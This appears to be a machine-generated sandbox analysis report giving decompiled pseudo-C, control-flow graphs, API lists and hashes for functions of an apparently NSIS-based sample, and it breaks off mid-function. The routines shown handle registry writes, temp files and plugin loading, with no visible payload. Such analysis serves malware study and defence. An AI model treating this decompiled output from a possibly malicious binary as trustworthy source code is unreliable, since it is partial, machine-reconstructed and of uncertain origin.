                                                control_flow_graph 886 73541817-73541856 call 73541bff 890 73541976-73541978 886->890 891 7354185c-73541860 886->891 892 73541862-73541868 call 7354243e 891->892 893 73541869-73541876 call 73542480 891->893 892->893 898 735418a6-735418ad 893->898 899 73541878-7354187d 893->899 900 735418cd-735418d1 898->900 901 735418af-735418cb call 73542655 call 73541654 call 73541312 GlobalFree 898->901 902 7354187f-73541880 899->902 903 73541898-7354189b 899->903 904 735418d3-7354191c call 73541666 call 73542655 900->904 905 7354191e-73541924 call 73542655 900->905 927 73541925-73541929 901->927 908 73541882-73541883 902->908 909 73541888-73541889 call 73542b98 902->909 903->898 906 7354189d-7354189e call 73542e23 903->906 904->927 905->927 920 735418a3 906->920 915 73541885-73541886 908->915 916 73541890-73541896 call 73542810 908->916 917 7354188e 909->917 915->898 915->909 926 735418a5 916->926 917->920 920->926 926->898 930 73541966-7354196d 927->930 931 7354192b-73541939 call 73542618 927->931 930->890 933 7354196f-73541970 GlobalFree 930->933 936 73541951-73541958 931->936 937 7354193b-7354193e 931->937 933->890 936->930 939 7354195a-73541965 call 735415dd 936->939 937->936 938 73541940-73541948 937->938 938->936 940 7354194a-7354194b FreeLibrary 938->940 939->930 940->936
                                                C-Code - Quality: 88%
                                                			E73541817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v136;
                                                				struct HINSTANCE__* _t37;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x7354506c = _a8;
                                                				 *0x73545070 = _a16;
                                                				 *0x73545074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x73545048, E73541651);
                                                				_push(1); // executed
                                                				_t37 = E73541BFF(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E7354243E(_t54);
                                                					}
                                                					_push(_t54);
                                                					E73542480(_t67);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_push(_t54);
                                                								_t37 = E73542655();
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x1018; // 0x1018
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E73541666(_t54,  &_v136);
                                                								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                								_t18 = _t54 + 0x1018; // 0x1018
                                                								_t72 = _t18;
                                                								_push(_t54);
                                                								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                								 *_t72 = 4;
                                                								E73542655();
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							_push(_t54);
                                                							E73542655();
                                                							_t37 = GlobalFree(E73541312(E73541654(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E73542618(_t54);
                                                							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x1008);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                								_t37 = E735415DD( *0x73545068);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t54);
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E73542E23(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E73542B98(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E73542810(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}


















                                                0x73541817
                                                0x73541817
                                                0x73541817
                                                0x73541824
                                                0x7354182c
                                                0x73541839
                                                0x73541847
                                                0x7354184a
                                                0x7354184c
                                                0x73541851
                                                0x73541856
                                                0x73541978
                                                0x73541978
                                                0x7354185c
                                                0x73541860
                                                0x73541863
                                                0x73541868
                                                0x73541869
                                                0x7354186a
                                                0x73541870
                                                0x73541876
                                                0x735418a6
                                                0x735418ad
                                                0x735418d1
                                                0x7354191e
                                                0x7354191f
                                                0x735418d3
                                                0x735418d3
                                                0x735418d4
                                                0x735418dd
                                                0x735418de
                                                0x735418e8
                                                0x735418eb
                                                0x735418f0
                                                0x735418f7
                                                0x735418f7
                                                0x735418fd
                                                0x735418fe
                                                0x73541904
                                                0x7354190a
                                                0x73541917
                                                0x73541918
                                                0x7354191b
                                                0x735418af
                                                0x735418af
                                                0x735418b0
                                                0x735418c5
                                                0x735418c5
                                                0x73541929
                                                0x7354192c
                                                0x73541939
                                                0x73541940
                                                0x73541948
                                                0x7354194b
                                                0x7354194b
                                                0x73541948
                                                0x73541958
                                                0x73541960
                                                0x73541965
                                                0x73541958
                                                0x7354196d
                                                0x00000000
                                                0x7354196f
                                                0x00000000
                                                0x73541970
                                                0x7354196d
                                                0x7354187a
                                                0x7354187d
                                                0x7354189b
                                                0x00000000
                                                0x00000000
                                                0x7354189e
                                                0x735418a3
                                                0x735418a3
                                                0x735418a5
                                                0x00000000
                                                0x735418a5
                                                0x7354187f
                                                0x73541880
                                                0x73541888
                                                0x73541889
                                                0x00000000
                                                0x73541889
                                                0x73541882
                                                0x73541883
                                                0x73541891
                                                0x00000000
                                                0x73541891
                                                0x73541886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541886

                                                APIs
                                                  • Part of subcall function 73541BFF: GlobalFree.KERNEL32 ref: 73541E74
                                                  • Part of subcall function 73541BFF: GlobalFree.KERNEL32 ref: 73541E79
                                                  • Part of subcall function 73541BFF: GlobalFree.KERNEL32 ref: 73541E7E
                                                • GlobalFree.KERNEL32 ref: 735418C5
                                                • FreeLibrary.KERNEL32(?), ref: 7354194B
                                                • GlobalFree.KERNEL32 ref: 73541970
                                                  • Part of subcall function 7354243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7354246F
                                                  • Part of subcall function 73542810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73541896,00000000), ref: 735428E0
                                                  • Part of subcall function 73541666: wsprintfW.USER32 ref: 73541694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 3f7e9f8ce80d2d892e4d0532799bb35649aebc7663f508fceaa1bee014a880f4
                                                • Instruction ID: 0502afb9d22ea1e8ed9aef8cba938676d9e114868bc0946211df0d1db97160c4
                                                • Opcode Fuzzy Hash: 3f7e9f8ce80d2d892e4d0532799bb35649aebc7663f508fceaa1bee014a880f4
                                                • Instruction Fuzzy Hash: 8241A3725003159BEB1DAF74F888B9537BCAF05354F286466ED4B9E0C6DB78C285CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 943 40248a-4024bb call 402da6 * 2 call 402e36 950 4024c1-4024cb 943->950 951 402c2a-402c39 943->951 952 4024cd-4024da call 402da6 lstrlenW 950->952 953 4024de-4024e1 950->953 952->953 955 4024e3-4024f4 call 402d84 953->955 956 4024f5-4024f8 953->956 955->956 960 402509-40251d RegSetValueExW 956->960 961 4024fa-402504 call 4032b4 956->961 965 402522-402603 RegCloseKey 960->965 966 40251f 960->966 961->960 965->951 966->965
                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                				void* _t20;
                                                				void* _t21;
                                                				int _t24;
                                                				long _t25;
                                                				int _t30;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				void* _t42;
                                                
                                                				_t42 = __eflags;
                                                				_t33 = __edx;
                                                				_t30 = __ebx;
                                                				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                				_t34 = __eax;
                                                				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                				 *(_t39 - 0x44) = E00402DA6(2);
                                                				_t20 = E00402DA6(0x11);
                                                				 *(_t39 - 4) = 1;
                                                				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                				 *(_t39 + 8) = _t21;
                                                				if(_t21 != __ebx) {
                                                					_t24 = 0;
                                                					if(_t37 == 1) {
                                                						E00402DA6(0x23);
                                                						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                					}
                                                					if(_t37 == 4) {
                                                						 *0x40b5f0 = E00402D84(3);
                                                						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                						_t24 = _t37;
                                                					}
                                                					if(_t37 == 3) {
                                                						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                					}
                                                					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                					if(_t25 == 0) {
                                                						 *(_t39 - 4) = _t30;
                                                					}
                                                					_push( *(_t39 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                				return 0;
                                                			}













                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x00402515
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nss732B.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nss732B.tmp,00000000,00000011,00000002), ref: 00402515
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nss732B.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nss732B.tmp
                                                • API String ID: 2655323295-3916350592
                                                • Opcode ID: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                • Opcode Fuzzy Hash: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 968 405f14-405f2f call 40653d call 405eb7 973 405f31-405f33 968->973 974 405f35-405f42 call 4067c4 968->974 975 405f8d-405f8f 973->975 978 405f52-405f56 974->978 979 405f44-405f4a 974->979 981 405f6c-405f75 lstrlenW 978->981 979->973 980 405f4c-405f50 979->980 980->973 980->978 982 405f77-405f8b call 405e0c GetFileAttributesW 981->982 983 405f58-405f5f call 406873 981->983 982->975 988 405f61-405f64 983->988 989 405f66-405f67 call 405e58 983->989 988->973 988->989 989->981
                                                C-Code - Quality: 53%
                                                			E00405F14(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				long _t16;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E0040653D(0x42fa70, _a4);
                                                				_t21 = E00405EB7(0x42fa70);
                                                				if(_t21 != 0) {
                                                					E004067C4(_t21);
                                                					if(( *0x434f18 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x42fa70 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x42fa70);
                                                							_push(0x42fa70);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406873();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405E58(0x42fa70);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405E0C();
                                                						_t16 = GetFileAttributesW(??); // executed
                                                						return 0 | _t16 != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}









                                                0x00405f20
                                                0x00405f2b
                                                0x00405f2f
                                                0x00405f36
                                                0x00405f42
                                                0x00405f52
                                                0x00405f54
                                                0x00405f6c
                                                0x00405f6d
                                                0x00405f74
                                                0x00405f75
                                                0x00000000
                                                0x00000000
                                                0x00405f58
                                                0x00405f5f
                                                0x00405f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f5f
                                                0x00405f77
                                                0x00405f7d
                                                0x00000000
                                                0x00405f8b
                                                0x00405f44
                                                0x00405f4a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f4a
                                                0x00405f31
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                • GetFileAttributesW.KERNEL32(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-615423462
                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a57c; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x00406062
                                                0x00406068
                                                0x00406069
                                                0x00406069
                                                0x0040606e
                                                0x0040606f
                                                0x00406072
                                                0x00406077
                                                0x0040607a
                                                0x00406084
                                                0x00406091
                                                0x00406095
                                                0x0040609d
                                                0x00000000
                                                0x00000000
                                                0x004060a1
                                                0x00000000
                                                0x004060a3
                                                0x004060a3
                                                0x004060a3
                                                0x004060a6
                                                0x004060a9
                                                0x004060a9
                                                0x004060ac
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1857211195
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                				int _v8;
                                                				long _t21;
                                                				long _t24;
                                                				char* _t30;
                                                
                                                				asm("sbb eax, eax");
                                                				_v8 = 0x800;
                                                				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                				_t30 = _a16;
                                                				if(_t21 != 0) {
                                                					L4:
                                                					 *_t30 =  *_t30 & 0x00000000;
                                                				} else {
                                                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                					_t21 = RegCloseKey(_a20);
                                                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                						goto L4;
                                                					}
                                                				}
                                                				return _t21;
                                                			}







                                                0x00406419
                                                0x0040641b
                                                0x00406433
                                                0x00406438
                                                0x0040643d
                                                0x0040647b
                                                0x0040647b
                                                0x0040643f
                                                0x00406451
                                                0x0040645c
                                                0x00406462
                                                0x0040646d
                                                0x00000000
                                                0x00000000
                                                0x0040646d
                                                0x00406481

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll), ref: 0040645C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				WCHAR* _t35;
                                                				intOrPtr* _t36;
                                                				void* _t37;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x434fc0");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t35 = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                					_t47 = _t23 - _t32;
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                					if(_t36 == _t32) {
                                                						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                							if( *_t36() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t35); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x004020d8
